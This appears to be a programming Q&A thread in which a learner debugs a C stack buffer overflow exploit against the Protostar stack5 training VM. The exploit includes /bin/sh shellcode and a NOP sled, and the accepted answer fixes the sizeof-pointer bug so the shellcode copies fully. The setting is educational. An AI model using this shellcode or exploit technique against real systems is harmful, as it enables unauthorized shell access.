# Simple buffer overflow exploit doesn't work

Tags: c, buffer-overflow, exploit, shellcode

I was trying to reproduce the first buffer overflow exploit in C written inside the [Hacking art of exploitation](https://www.amazon.it/Hacking-Art-Exploitation-2nd-English-ebook/dp/B004OEJN3I) book. I tried it on the Stack5 exercise in [Protostar vm](https://exploit.education/protostar/stack-five/) but it didn't work. Of course I adapted it, but I'm still a newbie so I don't know what I should fix. This is the code of the exploit:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char *argv[])
{
    unsigned int i, ret, offset = 0;
    char *command, *buffer;

    command = (char *)malloc(200);
    bzero(command, 200);
    strcpy(command, "echo \'");
    buffer = command + strlen(command);

    if (argc > 1)
    {
        offset = atoi(argv[1]);
    }
    ret = (unsigned int)&i - offset;

    printf("The choosed offset is %d\n", offset);

    for (i = 0; i < 200; i += 4)
    {
        *((unsigned int *)(buffer + i)) = ret;
    }

    memset(buffer, 0x90, 26);
    memcpy(buffer + 26, shellcode, sizeof(shellcode) - 1);

    strcat(command, "\' | /opt/protostar/bin/stack5");

    printf("The command is %s\n", command);
    printf("The buffer is %x\n", buffer);

    system(command);
    return 0;
}
```

Before this I tried out the shellcode and it worked, so that's not the problem.

So the first thing that I did was fire up gdb and debug my code.

This is my `command` variable after the bzero function is called:
[image: after bzero]

This is my `command` variable after the for loop for setting the return variable (I know that the address it's not correct but I will fix that later):
[image: after ret]

This is my `command` variable after putting the nop sled (so far everything normal):
[image: after the nop sled]

This is my `command` variable after putting the shellcode (here I can't find the error...):
[image: after putting the shellcode]

I don't know why the shellcode doesn't appear inside the `command` variable it didn't change anything except for some bytes after the NOP sled.

What do I do wrong?

Answer (score 1, accepted):

> What do I do wrong?

```
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
…
    memcpy(buffer + 26, shellcode, sizeof(shellcode) - 1);
```

It's just that you defined `shellcode` as a pointer, the size of which is 4 bytes on your system, so only 3 bytes are copied; the correct size results if you define an array instead:

```
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
```